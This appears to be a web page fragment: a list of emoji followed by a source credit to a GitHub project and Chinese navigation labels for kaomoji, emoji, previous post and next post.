🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇